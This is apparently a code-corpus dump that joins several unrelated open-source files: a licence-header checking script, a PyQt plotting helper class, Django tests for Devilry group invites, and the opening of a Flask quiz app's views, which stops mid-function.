(["riviera_run.do"], HASH), # Riviera dofile ([".do"], SLASH_SLASH), # Cadence LEC dofile # Software Files ([".c", ".c.tpl", ".h", ".h.tpl", ".cc", ".cpp"], SLASH_SLASH), # C, C++ ([".def"], SLASH_SLASH), # C, C++ X-Include List Declaration Files ([".S"], [SLASH_SLASH, SLASH_STAR]), # Assembly (With Preprocessing) ([".s"], SLASH_STAR), # Assembly (Without Preprocessing) ([".ld", ".ld.tpl"], SLASH_STAR), # Linker Scripts ([".rs", ".rs.tpl"], SLASH_SLASH), # Rust # Software Build Systems (["meson.build", "toolchain.txt", "meson_options.txt"], HASH), # Meson # General Tooling ([".py"], HASH), # Python ([".sh"], HASH), # Shell Scripts (["Dockerfile"], HASH), # Dockerfiles # Configuration ([".hjson", ".hjson.tpl"], SLASH_SLASH), # hjson ([".yml", ".yaml"], HASH), # YAML ([".toml"], HASH), # TOML (["-requirements.txt"], HASH), # Apt and Python requirements files (["redirector.conf"], HASH), # nginx config # Documentation ([".md", ".md.tpl", ".html"], []), # Markdown and HTML (not checked) ([".css"], SLASH_STAR), # CSS ([".scss"], SLASH_SLASH), # SCSS # Templates (Last because there are overlaps with extensions above) ([".tpl"], HASH), # Mako templates ] class LicenceMatcher: '''An object to match a given licence at the start of a file''' def __init__(self, comment_style, licence, match_regex): self.style = comment_style self.expected_lines = list() # In case we are using regex matching we can pass the full line "as is" if match_regex: for i, ll in enumerate(licence): try: self.expected_lines.append( comment_style.full_line_pattern(ll)) # Catch any regex error here and raise a runtime error. except re.error as e: raise RuntimeError( "Can't compile line {} of the licence as a regular expression. Saw `{}`: {}" .format(i, e.pattern[e.pos], e.msg)) # use the "first line" as a licence marker self.search_marker = self.expected_lines[0] # For non-regex matching we need to escape everything. # This can never throw an exception as everything has been escaped and # therefore is always a legal regex. else: self.search_marker = comment_style.search_line_pattern( licence.first_word) self.expected_lines = [ comment_style.full_line_pattern(re.escape(ll)) for ll in licence ] self.lines_left = [] def looks_like_first_line_comment(self, line): return line.startswith(self.style.first_line_prefix) def looks_like_comment(self, line): return line.startswith(self.style.comment_prefix) def looks_like_first_line(self, line): return self.search_marker.match(line) is not None def start(self): '''Reset lines_left, to match at the start of the licence''' self.lines_left = self.expected_lines def take_line(self, line): '''Check whether line matches the next line of the licence. Returns a pair (matched, done). matched is true if the line matched. If this was the last line of the licence, done is true. On a match, this increments an internal counter, so the next call to take_line will match against the next line of the licence. ''' # If we have no more lines to match, claim a match and that we're done. # This shouldn't happen in practice, except if the configuration has an # empty licence. if not self.lines_left: return (True, True) next_expected = self.lines_left[0] matched = next_expected.fullmatch(line) if not matched: return (False, False) if matched: self.lines_left = self.lines_left[1:] return (True, not self.lines_left) def detect_comment_char(all_matchers, filename): '''Find zero or more LicenceMatcher objects for filename all_matchers should be a dict like COMMENT_STYLES, but where the values are the corresponding LicenceMatcher objects. ''' found = None for (suffixes, keys) in COMMENT_CHARS: if found is not None: break for suffix in suffixes: if filename.endswith(suffix): found = keys break if found is None: return [] if not isinstance(found, list): assert isinstance(found, str) found = [found] return [all_matchers[key] for key in found] def git_find_repo_toplevel(): git_output = subprocess.check_output( ['git', 'rev-parse', '--show-toplevel']) return Path(git_output.decode().strip()).resolve() def git_find_all_file_paths(top_level, search_paths): git_output = subprocess.check_output( ["git", "-C", str(top_level), "ls-files", "-z", "--", *search_paths]) for path in git_output.rstrip(b"\0").split(b"\0"): yield Path(top_level, path.decode()) class ResultsTracker(object): """Helper for tracking results""" def __init__(self, base_dir): self.base_dir = base_dir passed_count = 0 failed_count = 0 excluded_count = 0 skipped_count = 0 failing_paths = set() @property def total_count(self): return (self.passed_count + self.failed_count + self.skipped_count + self.excluded_count) def passed(self, path, line_no, reason): rel_path = path.relative_to(self.base_dir) logging.debug("%s:%d PASSED: %s", str(rel_path), line_no, reason) self.passed_count += 1 def failed(self, path, line_no, reason): rel_path = path.relative_to(self.base_dir) logging.error("%s:%d FAILED: %s", str(rel_path), line_no, reason) self.failing_paths.add(rel_path) self.failed_count += 1 def skipped(self, path, reason): rel_path = path.relative_to(self.base_dir) logging.info("%s: SKIPPED: %s", str(rel_path), reason) self.skipped_count += 1 def excluded(self, path, reason): rel_path = path.relative_to(self.base_dir) logging.debug("%s: EXCLUDED: %s", str(rel_path), reason) self.excluded_count += 1 def any_failed(self): return self.failed_count > 0 def display_nicely(self): headers = ["Results:", "Files"] results = [["Passed", self.passed_count], ["Failed", self.failed_count], ["Skipped", self.skipped_count], ["Excluded", self.excluded_count], ["Total", self.total_count]] return tabulate(results, headers, tablefmt="simple") def matches_exclude_pattern(config, file_path): rel_path = str(file_path.relative_to(config.base_dir)) for exclude_pattern in config.exclude_paths: if fnmatch.fnmatch(rel_path, exclude_pattern): return True return False def check_paths(config, git_paths): results = ResultsTracker(config.base_dir) try: all_matchers = { key: LicenceMatcher(style, config.licence, config.match_regex) for key, style in COMMENT_STYLES.items() } except RuntimeError as e: exit(e) for filepath in git_find_all_file_paths(config.base_dir, git_paths): # Skip symlinks (with message) if filepath.is_symlink(): results.excluded(filepath, "File is a symlink") continue # Skip non-file if not filepath.is_file(): continue # Skip exclude patterns if matches_exclude_pattern(config, filepath): results.excluded(filepath, "Path matches exclude pattern") continue check_file_for_licence(all_matchers, results, filepath) return results def check_file_for_licence(all_matchers, results, filepath): matchers = detect_comment_char(all_matchers, filepath.name) if not matchers: results.skipped(filepath, "Unknown comment style") return if filepath.stat().st_size == 0: results.skipped(filepath, "Empty file") return problems = [] for matcher in matchers: good, line_num, msg = check_file_with_matcher(matcher, filepath) if good: results.passed(filepath, line_num, msg) return else: problems.append((line_num, msg)) # If we get here, we didn't find a matching licence for line_num, msg in problems: results.failed(filepath, line_num, msg) def check_file_with_matcher(matcher, filepath): '''Check the file at filepath against matcher. Returns a tuple (is_good, line_number, msg). is_good is True on success; False on failure. line_number is the position where the licence was found (on success) or where we gave up searching for it (on failure). msg is the associated success or error message. ''' def next_line(file, line_no): return (next(file).rstrip(), line_no + 1) with filepath.open() as f: licence_assumed_start = None # Get first line try: line, line_no = next_line(f, 0) except StopIteration: return (False, 1, "Empty file") # Check first line against the first word of licence, or against a # possible different first line. if not matcher.looks_like_first_line(line): if not matcher.looks_like_first_line_comment(line): return (False, line_no, "File does not start with comment") try: line, line_no = next_line(f, line_no) except StopIteration: return (False, line_no, "Reached end of file before finding licence") # Skip lines that don't seem to be the first line of the licence while not matcher.looks_like_first_line(line): try: line, line_no = next_line(f, line_no) except StopIteration: return (False, line_no, "Reached end of file before finding licence") if not matcher.looks_like_comment(line): return (False, line_no, "First comment ended before licence notice") # We found the marker, so we found the first line of the licence. The # current line is in the first comment, so check the line matches the # expected first line: licence_assumed_start = line_no matcher.start() matched, done = matcher.take_line(line) if not matched: return (False, line_no, "Licence does not match") while not done: try: line, line_no = next_line(f, line_no) except StopIteration: return (False, line_no, "Reached end of file before finding licence") # Check against full expected line. matched, done = matcher.take_line(line) if not matched: return (False, line_no, "Licence did not match") return (True, licence_assumed_start, "Licence found") def main(): desc = "A tool to check the lowRISC licence header is in each source file" parser = argparse.ArgumentParser(description=desc) parser.add_argument("--config", metavar="config.hjson", type=argparse.FileType('r', encoding='UTF-8'), required=True, help="HJSON file to read for licence configuration.") parser.add_argument("paths", metavar="path", nargs='*', default=["."], help="Paths to check for licence headers.") parser.add_argument('-v', "--verbose", action='store_true', dest='verbose', help="Verbose output") options = parser.parse_args() if options.verbose: logging.basicConfig(format="%(levelname)s: %(message)s", level=logging.INFO) else: logging.basicConfig(format="%(levelname)s: %(message)s") config = SimpleNamespace() config.base_dir = git_find_repo_toplevel() parsed_config = hjson.load(options.config) config.licence = LicenceHeader(parsed_config['licence']) config.exclude_paths = set(parsed_config['exclude_paths']) # Check whether we should use regex matching or full string matching. match_regex = parsed_config.get('match_regex', 'false') if match_regex not in ['true', 'false']: print('Invalid value for match_regex: {!r}. ' 'Should be "true" or "false".'.format(match_regex)) exit(1) config.match_regex = match_regex == 'true' results = check_paths(config, options.paths) print(results.display_nicely()) if results.any_failed(): print("Failed:") for path in results.failing_paths: print(" {}".format(str(path))) print("") exit(1) else: exit(0) if __name__ == '__main__': main()
apache-2.0
-6,870,868,201,439,118,000
33.276596
100
0.596524
false
jithinbp/vLabtool-v0
v0/utilitiesClass.py
1
2985
import time,random,functools import numpy as np from PyQt4 import QtCore, QtGui import pyqtgraph as pg import pyqtgraph.opengl as gl class utilitiesClass(): """ This class contains methods that simplify setting up and running an experiment. """ timers=[] viewBoxes=[] plots3D=[] plots2D=[] axisItems=[] total_plot_areas=0 def __init__(self): pass def updateViews(self,plot): for a in plot.viewBoxes: a.setGeometry(plot.getViewBox().sceneBoundingRect()) a.linkedViewChanged(plot.plotItem.vb, a.XAxis) def random_color(self): c=QtGui.QColor(random.randint(20,255),random.randint(20,255),random.randint(20,255)) if np.average(c.getRgb())<150: c=self.random_color() return c def add2DPlot(self,plot_area): plot=pg.PlotWidget() plot.setMinimumHeight(250) plot_area.addWidget(plot) plot.viewBoxes=[] self.plots2D.append(plot) return plot def add3DPlot(self,plot_area): plot3d = gl.GLViewWidget() #gx = gl.GLGridItem();gx.rotate(90, 0, 1, 0);gx.translate(-10, 0, 0);self.plot.addItem(gx) #gy = gl.GLGridItem();gy.rotate(90, 1, 0, 0);gy.translate(0, -10, 0);self.plot.addItem(gy) gz = gl.GLGridItem();#gz.translate(0, 0, -10); plot3d.addItem(gz); plot3d.opts['distance'] = 40 plot3d.opts['elevation'] = 5 plot3d.opts['azimuth'] = 20 plot3d.setMinimumHeight(250) plot_area.addWidget(plot3d) self.plots3D.append(plot3d) plot3d.plotLines3D=[] return plot3d def addCurve(self,plot,name='',col=(255,255,255),axis='left'): #if(len(name)):curve = plot.plot(name=name) #else:curve = plot.plot() if(len(name)):curve = pg.PlotCurveItem(name=name) else:curve = pg.PlotCurveItem() plot.addItem(curve) curve.setPen(color=col, width=1) return curve def rebuildLegend(self,plot): return plot.addLegend(offset=(-10,30)) def addAxis(self,plot,**args): p3 = pg.ViewBox() ax3 = pg.AxisItem('right') plot.plotItem.layout.addItem(ax3, 2, 3+len(self.axisItems)) plot.plotItem.scene().addItem(p3) ax3.linkToView(p3) p3.setXLink(plot.plotItem) ax3.setZValue(-10000) if args.get('label',False): ax3.setLabel(args.get('label',False), color=args.get('color','#ffffff')) plot.viewBoxes.append(p3) p3.setGeometry(plot.plotItem.vb.sceneBoundingRect()) p3.linkedViewChanged(plot.plotItem.vb, p3.XAxis) ## Handle view resizing Callback = functools.partial(self.updateViews,plot) plot.getViewBox().sigStateChanged.connect(Callback) self.axisItems.append(ax3) return p3 def loopTask(self,interval,func,*args): timer = QtCore.QTimer() timerCallback = functools.partial(func,*args) timer.timeout.connect(timerCallback) timer.start(interval) self.timers.append(timer) return timer def delayedTask(self,interval,func,*args): timer = QtCore.QTimer() timerCallback = functools.partial(func,*args) timer.singleShot(interval,timerCallback) self.timers.append(timer) def displayDialog(self,txt=''): QtGui.QMessageBox.about(self, 'Message', txt)
gpl-3.0
-7,986,475,858,903,219,000
25.651786
92
0.710218
false
devilry/devilry-django
devilry/apps/core/tests/test_groupinvite.py
1
24874
from django.core import mail from django.core.exceptions import ValidationError from django.test import TestCase from django.utils import timezone from django.utils.timezone import timedelta from django.urls import reverse from model_bakery import baker from devilry.apps.core import devilry_core_baker_factories as core_baker from devilry.apps.core.models import AssignmentGroup from devilry.apps.core.models import GroupInvite from devilry.devilry_dbcache.customsql import AssignmentGroupDbCacheCustomSql class TestGroupInviteErrors(TestCase): def setUp(self): AssignmentGroupDbCacheCustomSql().initialize() def test_user_sending_is_not_part_of_the_group(self): testgroup = baker.make('core.AssignmentGroup') testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode) testgroup2 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode) sent_by = core_baker.candidate(testgroup1).relatedstudent.user sent_to = core_baker.candidate(testgroup2).relatedstudent.user with self.assertRaisesMessage( ValidationError, 'The user sending an invite must be a Candiate on the group.'): invite = baker.make( 'core.GroupInvite', group=testgroup, sent_by=sent_by, sent_to=sent_to ) invite.full_clean() def test_student_already_member_of_the_group(self): testgroup = baker.make('core.AssignmentGroup') sent_by = core_baker.candidate(testgroup).relatedstudent.user sent_to = core_baker.candidate(testgroup).relatedstudent.user with self.assertRaisesMessage( ValidationError, 'The student is already a member of the group.'): invite = baker.make( 'core.GroupInvite', group=testgroup, sent_by=sent_by, sent_to=sent_to ) invite.full_clean() def test_student_already_invited_but_not_responded(self): testgroup = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True) testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode) sent_by = core_baker.candidate(testgroup).relatedstudent.user sent_to = core_baker.candidate(testgroup1).relatedstudent.user baker.make('core.GroupInvite', group=testgroup, sent_by=sent_by, sent_to=sent_to) with self.assertRaisesMessage( ValidationError, 'The student is already invited to join the group, but they have not responded yet.'): invite = baker.make( 'core.GroupInvite', group=testgroup, sent_by=sent_by, sent_to=sent_to ) invite.full_clean() def test_create_groups_expired(self): testgroup = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True, parentnode__students_can_not_create_groups_after=timezone.now() - timedelta(days=1)) testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode) sent_by = core_baker.candidate(testgroup).relatedstudent.user sent_to = core_baker.candidate(testgroup1).relatedstudent.user with self.assertRaisesMessage( ValidationError, 'Creating project groups without administrator approval is not ' 'allowed on this assignment anymore. Please contact you course ' 'administrator if you think this is wrong.'): invite = baker.make( 'core.GroupInvite', group=testgroup, sent_by=sent_by, sent_to=sent_to ) invite.full_clean() def test_assignment_does_not_allow_students_to_form_groups(self): testgroup = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=False) testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode) sent_by = core_baker.candidate(testgroup).relatedstudent.user sent_to = core_baker.candidate(testgroup1).relatedstudent.user with self.assertRaisesMessage( ValidationError, 'This assignment does not allow students to form project groups on their own.'): invite = baker.make( 'core.GroupInvite', group=testgroup, sent_by=sent_by, sent_to=sent_to ) invite.full_clean() def test_student_sent_to_is_not_registerd_on_assignment(self): testgroup = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True) testgroup1 = baker.make('core.AssignmentGroup') sent_by = core_baker.candidate(testgroup).relatedstudent.user sent_to = core_baker.candidate(testgroup1).relatedstudent.user with self.assertRaisesMessage( ValidationError, 'The invited student is not registered on this assignment.'): invite = baker.make( 'core.GroupInvite', group=testgroup, sent_by=sent_by, sent_to=sent_to ) invite.full_clean() def test_student_sent_to_is_already_in_a_group_with_more_than_one_student(self): testgroup = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True) testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode) sent_by = core_baker.candidate(testgroup).relatedstudent.user sent_to = core_baker.candidate(testgroup1).relatedstudent.user core_baker.candidate(testgroup1) with self.assertRaisesMessage( ValidationError, 'The invited student is already in a project group with more than 1 students.'): invite = baker.make( 'core.GroupInvite', group=testgroup, sent_by=sent_by, sent_to=sent_to, accepted=True ) invite.full_clean() def test_sanity(self): testgroup = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True) testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode) sent_by = core_baker.candidate(testgroup).relatedstudent.user sent_to = core_baker.candidate(testgroup1).relatedstudent.user invite = baker.make( 'core.GroupInvite', group=testgroup, sent_by=sent_by, sent_to=sent_to ) invite.full_clean() self.assertEqual(invite.sent_to, sent_to) self.assertEqual(invite.sent_by, sent_by) self.assertEqual(invite.group, testgroup) self.assertIsNotNone(invite.sent_datetime) def test_sanity_accepted(self): testgroup = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True) testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode) sent_by = core_baker.candidate(testgroup).relatedstudent.user sent_to = core_baker.candidate(testgroup1).relatedstudent.user invite = baker.make( 'core.GroupInvite', group=testgroup, sent_by=sent_by, sent_to=sent_to, accepted=True ) invite.full_clean() self.assertEqual(invite.sent_to, sent_to) self.assertEqual(invite.sent_by, sent_by) self.assertEqual(invite.group, testgroup) self.assertTrue(invite.accepted) self.assertIsNotNone(invite.responded_datetime) class TestGroupInviteQueryset(TestCase): def setUp(self): AssignmentGroupDbCacheCustomSql().initialize() def test_queryset_sanity(self): baker.make('core.GroupInvite', id=100) self.assertEqual(GroupInvite.objects.all().first().id, 100) def test_filter_accepted(self): baker.make('core.GroupInvite', accepted=None, id=10) baker.make('core.GroupInvite', accepted=False, id=11) baker.make('core.GroupInvite', accepted=True, id=100) baker.make('core.GroupInvite', accepted=True, id=101) self.assertEqual( set(invite.id for invite in GroupInvite.objects.filter_accepted()), {100, 101} ) def test_filter_no_response(self): baker.make('core.GroupInvite', accepted=None, id=10) baker.make('core.GroupInvite', accepted=None, id=11) baker.make('core.GroupInvite', accepted=True, id=100) baker.make('core.GroupInvite', accepted=False, id=101) self.assertEqual( set(invite.id for invite in GroupInvite.objects.filter_no_response()), {10, 11} ) def test_filter_rejected(self): baker.make('core.GroupInvite', accepted=False, id=10) baker.make('core.GroupInvite', accepted=False, id=11) baker.make('core.GroupInvite', accepted=True, id=100) baker.make('core.GroupInvite', accepted=None, id=101) self.assertEqual( set(invite.id for invite in GroupInvite.objects.filter_rejected()), {10, 11} ) def test_filter_unanswered_received_invites(self): group = baker.make('core.AssignmentGroup') sent_by = core_baker.candidate(group=group).relatedstudent.user sent_to = core_baker.candidate(group=group).relatedstudent.user baker.make('core.GroupInvite', sent_by=sent_by, sent_to=sent_to, accepted=False, id=10) baker.make('core.GroupInvite', sent_by=sent_by, sent_to=sent_to, accepted=None, id=11) baker.make('core.GroupInvite', sent_by=sent_by, sent_to=sent_to, accepted=True, id=100) baker.make('core.GroupInvite', sent_by=sent_by, sent_to=sent_to, accepted=None, id=101) self.assertEqual( set(invite.id for invite in GroupInvite.objects.filter_unanswered_received_invites(sent_to)), {11, 101} ) def test_filter_unanswered_sent_invites(self): group = baker.make('core.AssignmentGroup') baker.make('core.GroupInvite', group=group, accepted=False, id=10) baker.make('core.GroupInvite', group=group, accepted=None, id=11) baker.make('core.GroupInvite', group=group, accepted=True, id=100) baker.make('core.GroupInvite', group=group, accepted=None, id=101) self.assertEqual( set(invite.id for invite in GroupInvite.objects.filter_unanswered_sent_invites(group)), {11, 101} ) def test_filter_allowed_to_create_groups(self): assignment_expired = baker.make( 'core.Assignment', students_can_create_groups=True, students_can_not_create_groups_after=timezone.now() - timedelta(days=1) ) assignment_not_expired = baker.make( 'core.Assignment', students_can_create_groups=True, students_can_not_create_groups_after=timezone.now() + timedelta(days=1) ) assignment_not_allowed = baker.make('core.Assignment', students_can_create_groups=False) assignment_allowed = baker.make('core.Assignment', students_can_create_groups=True) group1 = baker.make('core.AssignmentGroup', parentnode=assignment_expired) group2 = baker.make('core.AssignmentGroup', parentnode=assignment_not_expired) group3 = baker.make('core.AssignmentGroup', parentnode=assignment_not_allowed) group4 = baker.make('core.AssignmentGroup', parentnode=assignment_allowed) baker.make('core.GroupInvite', group=group1, id=10) baker.make('core.GroupInvite', group=group2, id=11) baker.make('core.GroupInvite', group=group3, id=100) baker.make('core.GroupInvite', group=group4, id=101) self.assertEqual( set(invite.id for invite in GroupInvite.objects.filter_allowed_to_create_groups()), {11, 101} ) class FakeRequest(object): def build_absolute_uri(self, location): return 'http://example.com{}'.format(location) class GroupInviteRespond(TestCase): def setUp(self): AssignmentGroupDbCacheCustomSql().initialize() def __fake_request(self): return FakeRequest() def test_respond_reject(self): group1 = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True) group2 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode) student1 = core_baker.candidate(group=group1).relatedstudent.user student2 = core_baker.candidate(group=group2).relatedstudent.user invite = baker.make('core.GroupInvite', sent_by=student1, sent_to=student2, group=group1) invite.respond(False) self.assertFalse(GroupInvite.objects.get(id=invite.id).accepted) group = AssignmentGroup.objects.filter_user_is_candidate(student2) self.assertEqual(group.count(), 1) self.assertEqual(group.first().id, group2.id) def test_respond_accept(self): group1 = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True) group2 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode) student1 = core_baker.candidate(group=group1).relatedstudent.user student2 = core_baker.candidate(group=group2).relatedstudent.user invite = baker.make('core.GroupInvite', sent_by=student1, sent_to=student2, group=group1) invite.respond(True) self.assertTrue(GroupInvite.objects.get(id=invite.id).accepted) group = AssignmentGroup.objects.filter_user_is_candidate(student2) self.assertEqual(group.count(), 1) self.assertEqual(group.first().id, group1.id) self.assertEqual(group.first().cached_data.candidate_count, 2) self.assertFalse(AssignmentGroup.objects.filter(id=group2.id).exists()) def test_num_queries_accept(self): group1 = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True) group2 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode) student1 = core_baker.candidate(group=group1).relatedstudent.user student2 = core_baker.candidate(group=group2).relatedstudent.user invite = baker.make('core.GroupInvite', sent_by=student1, sent_to=student2, group=group1) with self.assertNumQueries(36): invite.respond(True) def test_num_queries_reject(self): group1 = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True) group2 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode) student1 = core_baker.candidate(group=group1).relatedstudent.user student2 = core_baker.candidate(group=group2).relatedstudent.user invite = baker.make('core.GroupInvite', sent_by=student1, sent_to=student2, group=group1) with self.assertNumQueries(9): invite.respond(False) def test_send_invite_mail(self): assignment = baker.make( 'core.Assignment', long_name='Assignment 1', short_name='assignment1', parentnode__long_name='Spring2017', parentnode__short_name='s17', parentnode__parentnode__long_name='DUCK1010 - Object Oriented Programming', parentnode__parentnode__short_name='Duck1010', students_can_create_groups=True, ) testgroup = baker.make('core.AssignmentGroup', parentnode=assignment) testgroup1 = baker.make('core.AssignmentGroup', parentnode=assignment) sent_by = core_baker.candidate(testgroup, shortname="april@example.com", fullname="April").relatedstudent.user sent_to = core_baker.candidate(testgroup1, shortname="dewey@example.com", fullname="Dewey").relatedstudent.user baker.make('devilry_account.UserEmail', user=sent_to, email="dewey@example.com") invite = GroupInvite(group=testgroup, sent_by=sent_by, sent_to=sent_to) invite.full_clean() invite.save() request = self.__fake_request() invite.send_invite_notification(request) self.assertEqual(len(mail.outbox), 1) self.assertEqual(mail.outbox[0].subject, '[Devilry] Project group invite for Duck1010.s17.assignment1') url = request.build_absolute_uri( reverse('devilry_student_groupinvite_respond', kwargs={'invite_id': invite.id})) self.assertIn(url, mail.outbox[0].body) def test_send_reject_mail(self): assignment = baker.make( 'core.Assignment', long_name='Assignment 1', short_name='assignment1', parentnode__long_name='Spring2017', parentnode__short_name='s17', parentnode__parentnode__long_name='DUCK1010 - Object Oriented Programming', parentnode__parentnode__short_name='Duck1010', students_can_create_groups=True, ) testgroup = baker.make('core.AssignmentGroup', parentnode=assignment) testgroup1 = baker.make('core.AssignmentGroup', parentnode=assignment) sent_by = core_baker.candidate(testgroup, shortname="april@example.com", fullname="April").relatedstudent.user sent_to = core_baker.candidate(testgroup1, shortname="dewey@example.com", fullname="Dewey").relatedstudent.user baker.make('devilry_account.UserEmail', user=sent_to, email="dewey@example.com") baker.make('devilry_account.UserEmail', user=sent_by, email="april@example.com") invite = GroupInvite( group=testgroup, sent_by=sent_by, sent_to=sent_to ) invite.full_clean() invite.save() invite.send_invite_notification(self.__fake_request()) invite.respond(False) self.assertEqual(len(mail.outbox), 2) self.assertEqual(mail.outbox[1].subject, '[Devilry] Dewey rejected your project group invite') def test_send_accept_mail(self): assignment = baker.make( 'core.Assignment', long_name='Assignment 1', short_name='assignment1', parentnode__long_name='Spring2017', parentnode__short_name='s17', parentnode__parentnode__long_name='DUCK1010 - Object Oriented Programming', parentnode__parentnode__short_name='Duck1010', students_can_create_groups=True, ) testgroup = baker.make('core.AssignmentGroup', parentnode=assignment) testgroup1 = baker.make('core.AssignmentGroup', parentnode=assignment) sent_by = core_baker.candidate(testgroup, shortname="april@example.com", fullname="April").relatedstudent.user sent_to = core_baker.candidate(testgroup1, shortname="dewey@example.com", fullname="Dewey").relatedstudent.user baker.make('devilry_account.UserEmail', user=sent_to, email="dewey@example.com") baker.make('devilry_account.UserEmail', user=sent_by, email="april@example.com") invite = GroupInvite( group=testgroup, sent_by=sent_by, sent_to=sent_to ) invite.full_clean() invite.save() invite.send_invite_notification(self.__fake_request()) invite.respond(True) self.assertEqual(len(mail.outbox), 2) self.assertEqual(mail.outbox[1].subject, '[Devilry] Dewey accepted your project group invite') def test_send_invite_to_choices_queryset(self): group1 = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True) group2 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode) group3 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode) group4 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode) core_baker.candidate(group=group1, fullname="Louie", shortname="louie") core_baker.candidate(group=group2, fullname="Huey", shortname="huey") core_baker.candidate(group=group2, fullname="Donald", shortname="donald") candidate4 = core_baker.candidate(group=group3, fullname="April", shortname="april") candidate5 = core_baker.candidate(group=group4, fullname="Dewey", shortname="dewey") candidates = GroupInvite.send_invite_to_choices_queryset(group1) self.assertEqual(candidates.count(), 2) self.assertEqual( set(candidate.id for candidate in candidates), {candidate4.id, candidate5.id} ) def test_send_invite_to_choices_queryset_pending_is_excluded(self): group1 = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True) group2 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode) group3 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode) group4 = baker.make('core.AssignmentGroup', parentnode=group1.parentnode) candidate1 = core_baker.candidate(group=group1, fullname="Louie", shortname="louie") core_baker.candidate(group=group2, fullname="Huey", shortname="huey") core_baker.candidate(group=group2, fullname="Donald", shortname="donald") candidate4 = core_baker.candidate(group=group3, fullname="April", shortname="april") candidate5 = core_baker.candidate(group=group4, fullname="Dewey", shortname="dewey") baker.make( 'core.GroupInvite', group=group1, sent_to=candidate4.relatedstudent.user, sent_by=candidate1.relatedstudent.user ) candidates = GroupInvite.send_invite_to_choices_queryset(group1) self.assertEqual(candidates.count(), 1) self.assertEqual( set(candidate.id for candidate in candidates), {candidate5.id} ) def test_validate_user_id_send_to(self): assignment = baker.make('core.Assignment', students_can_create_groups=True) testgroup = baker.make('core.AssignmentGroup', parentnode=assignment) testgroup1 = baker.make('core.AssignmentGroup', parentnode=assignment) core_baker.candidate(testgroup) sent_to = core_baker.candidate(testgroup1) with self.assertNumQueries(1): GroupInvite.validate_candidate_id_sent_to(testgroup, sent_to.id) def test_validation_user_id_send_to_error_wrong_assignment(self): assignment = baker.make('core.Assignment', students_can_create_groups=True) testgroup = baker.make('core.AssignmentGroup', parentnode=assignment) testgroup1 = baker.make('core.AssignmentGroup') core_baker.candidate(testgroup) sent_to = core_baker.candidate(testgroup1) with self.assertRaisesMessage(ValidationError, 'The selected student is not eligible to join the group.'): GroupInvite.validate_candidate_id_sent_to(testgroup, sent_to.id) def test_validation_user_id_send_to_error_already_in_group(self): assignment = baker.make('core.Assignment', students_can_create_groups=True) testgroup = baker.make('core.AssignmentGroup', parentnode=assignment) core_baker.candidate(testgroup) sent_to = core_baker.candidate(testgroup) with self.assertRaisesMessage(ValidationError, 'The selected student is not eligible to join the group.'): GroupInvite.validate_candidate_id_sent_to(testgroup, sent_to.id) def test_invite_has_already_been_accepted(self): testgroup = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True) testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode) sent_by = core_baker.candidate(testgroup).relatedstudent.user sent_to = core_baker.candidate(testgroup1).relatedstudent.user invite = baker.make('core.GroupInvite', group=testgroup, sent_by=sent_by, sent_to=sent_to, accepted=True) with self.assertRaisesMessage(ValidationError, 'This invite has already been accepted.'): invite.respond(True) def test_invite_has_already_been_declined(self): testgroup = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True) testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode) sent_by = core_baker.candidate(testgroup).relatedstudent.user sent_to = core_baker.candidate(testgroup1).relatedstudent.user invite = baker.make('core.GroupInvite', group=testgroup, sent_by=sent_by, sent_to=sent_to, accepted=False) with self.assertRaisesMessage(ValidationError, 'This invite has already been declined.'): invite.respond(False)
bsd-3-clause
-7,695,764,086,700,360,000
48.947791
119
0.659564
false
koduj-z-klasa/python101
docs/webflask/quiz_orm/quiz2_pw/views.py
1
4117
# -*- coding: utf-8 -*- # quiz-orm/views.py from flask import render_template, request, redirect, url_for, abort, flash from app import app from models import Pytanie, Odpowiedz from forms import * @app.route('/') def index(): """Strona główna""" return render_template('index.html') @app.route('/lista') def lista(): """Pobranie wszystkich pytań z bazy i zwrócenie szablonu z listą pytań""" pytania = Pytanie().select().annotate(Odpowiedz) if not pytania.count(): flash('Brak pytań w bazie.', 'kom') return redirect(url_for('index')) return render_template('lista.html', pytania=pytania) @app.route('/quiz', methods=['GET', 'POST']) def quiz(): """Wyświetlenie pytań i odpowiedzi w formie quizu oraz ocena poprawności przesłanych odpowiedzi""" if request.method == 'POST': wynik = 0 for pid, odp in request.form.items(): odpok = Pytanie.select(Pytanie.odpok).where( Pytanie.id == int(pid)).scalar() if odp == odpok: wynik += 1 flash('Liczba poprawnych odpowiedzi, to: {0}'.format(wynik), 'sukces') return redirect(url_for('index')) # GET, wyświetl pytania pytania = Pytanie().select().annotate(Odpowiedz) if not pytania.count(): flash('Brak pytań w bazie.', 'kom') return redirect(url_for('index')) return render_template('quiz.html', pytania=pytania) def flash_errors(form): 